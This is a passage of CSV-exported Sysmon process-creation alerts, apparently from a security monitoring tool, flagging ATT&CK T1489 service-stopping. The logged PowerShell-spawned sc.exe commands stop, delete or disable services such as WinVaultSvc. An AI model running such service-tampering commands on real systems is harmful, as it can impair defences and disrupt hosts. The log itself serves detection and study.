360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.152172600Z"",""eventRecordID"":""2958"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.149\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010c7612600}\r\nProcessId: 3572\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.149"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-0010c7612600}"",""processId"":""3572"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.698",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.078 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010105f2600} +ProcessId: 6192 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfyxxx +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.080789400Z"",""eventRecordID"":""2955"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.078\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010105f2600}\r\nProcessId: 6192\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:57.078"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-0010105f2600}"",""processId"":""6192"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfyxxx"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.531",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.036 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-00104d5b2600} +ProcessId: 7744 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Xtfya +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Xtfya",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.040378500Z"",""eventRecordID"":""2953"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.036\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-00104d5b2600}\r\nProcessId: 7744\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Xtfya\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.036"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-00104d5b2600}"",""processId"":""7744"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Xtfya"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.432",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.022 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-001019592600} +ProcessId: 7684 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfya +CurrentDirectory: C:\Users\John 
Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.025516800Z"",""eventRecordID"":""2952"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.022\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-001019592600}\r\nProcessId: 7684\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.022"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-001019592600}"",""processId"":""7684"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfya"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.388",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.972 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010e7532600} +ProcessId: 1520 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) 
+Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfy +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.975163300Z"",""eventRecordID"":""2949"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.972\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010e7532600}\r\nProcessId: 1520\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.972"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-0010e7532600}"",""processId"":""1520"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfy"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.344",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.928 +ProcessGuid: 
{df9fc3d3-b3b0-5ecf-0000-00108a502600} +ProcessId: 6724 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinVaultSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.931161700Z"",""eventRecordID"":""2946"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.928\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00108a502600}\r\nProcessId: 6724\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.928"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-00108a502600}"",""processId"":""6724"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinVaultSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo 
-NoProfile""}}}", +"May 29, 2020 @ 14:19:25.333",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.916 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010154f2600} +ProcessId: 5532 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinVaultSvc Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinVaultSvc Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.920271500Z"",""eventRecordID"":""2945"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.916\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010154f2600}\r\nProcessId: 5532\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 
